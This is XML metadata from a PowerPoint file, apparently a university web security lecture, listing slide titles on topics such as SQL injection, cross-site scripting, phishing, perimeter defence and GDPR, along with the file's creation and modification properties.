      <vt:lpstr>What do hackers seek?</vt:lpstr>
      <vt:lpstr>Basic web application architecture</vt:lpstr>
      <vt:lpstr>Intelligence gathering</vt:lpstr>
      <vt:lpstr>Web application security issues</vt:lpstr>
      <vt:lpstr>Making it harder for hackers</vt:lpstr>
      <vt:lpstr>Single-layer Perimeter defence</vt:lpstr>
      <vt:lpstr>Multi-layer perimeter defence</vt:lpstr>
      <vt:lpstr>Encryption and the storage of data</vt:lpstr>
      <vt:lpstr>Secure socket layer (SSL)</vt:lpstr>
      <vt:lpstr>Social engineering</vt:lpstr>
      <vt:lpstr>Malware spreading                 through Facebook</vt:lpstr>
      <vt:lpstr>Another Facebook example</vt:lpstr>
      <vt:lpstr>Gathering data via social networks</vt:lpstr>
      <vt:lpstr>Phishing</vt:lpstr>
      <vt:lpstr>Most common attacks</vt:lpstr>
      <vt:lpstr>Input validation attacks</vt:lpstr>
      <vt:lpstr>SQL injection attacks</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS) attacks</vt:lpstr>
      <vt:lpstr>XSS attacks – malicious example</vt:lpstr>
      <vt:lpstr>Forms and data visibility</vt:lpstr>
      <vt:lpstr>Web security and the law</vt:lpstr>
      <vt:lpstr>GDPR</vt:lpstr>
      <vt:lpstr>GDPR</vt:lpstr>
      <vt:lpstr>GDPR</vt:lpstr>
      <vt:lpstr>Security and the assignment</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Security</dc:title>
  <dc:subject/>
  <dc:creator/>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ROOKSBY John</cp:lastModifiedBy>
  <cp:revision>542</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-24T11:25:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-01T13:33:01Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>